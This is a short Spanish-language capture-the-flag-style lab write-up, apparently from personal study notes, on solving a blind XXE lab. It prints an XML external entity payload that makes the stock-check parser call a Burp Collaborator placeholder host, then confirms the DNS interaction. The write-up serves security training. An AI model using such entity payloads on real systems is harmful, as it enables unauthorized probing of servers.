🧑‍🎤Laboratorio: Blind XXE with out-of-band interaction

Vamos a usar burp collaborator tal cual como pensaba que era:

En esencia vamos por lo mismo de lo anterior, un check stock con units que se procesan en el POST con el Extensible markup language, listo.

<!DOCTYPE foo [ <!ENTITY test SYSTEM "http://BURP-COLLAB.com"> ]>

Y claro en esencia no vemos nada en la respuesta, sin embargo, la resolución DNS del burp-Collaborator efectivamente si se hace, y es lo que vemos en el burp collaborator que ahí nos muestra:

Y vemos que el recurso de IP es el 3.251.105.27

Y efectivamente de esta manera se puede resolver el laboratorio:

PreviousLaboratorio: Exploiting XXE to perform SSRF attacks NextLaboratorio: Blind XXE with out-of-band interaction via XML parameter entities

Last updated 10 months ago